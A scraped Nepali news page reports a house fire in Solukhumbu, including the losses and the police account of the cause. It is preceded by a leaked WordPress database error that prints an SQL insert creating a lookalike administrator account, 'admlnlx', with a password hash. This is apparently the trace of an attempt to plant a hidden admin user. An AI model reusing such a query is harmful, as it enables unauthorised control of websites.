WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE0ba3dWKL1KDjF4Pnmy8mN4nFahwi/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 12:08:50', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, २९ पौष, सोलुखुम्बु । सोलुखुम्बुको सोलुदुधकुण्ड नगरापालिका वडा नम्बर २ बेनि स्थित मपुङका याङदी शेर्पाको घरमा आगलागि भएको छ ।
शेर्पाको घरमा आगलागी हुँदा २ लाख ८९ हजार ७ सयको क्षती भएको छ । शुक्रबार विहान ७:३० बजे आगलागी सुरु भएको करीब ३ घण्टा पछी आगो नियन्रणमा आएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ । आगो ताप्ने क्रममा आगो लागि भएको पनि जिल्ला प्रहरिले सोलुले जनाएको छ ।
शेर्पाको उक्त घरजग्गामा ओखलढुङगा खिजिदेम्बा गाउँपालिका ४ का तेज बहादुर तामाङले भाडामा लिएर बसोबास गर्दै आएका थिए ।
आगलागिबाट मानविय क्षती नभएको भए पनि माटोले बनेको टिनको छाना भएको १ तल्ले घर पूर्ण रुपमा जलेर नष्ट भएको छ । त्यस्तै आगलागिबाट एक तोला सुन, २५ तोला चाँदी, नगद ५० हजार र अन्नपात जलेर नष्ट भएको प्रहरीले जनाएको छ ।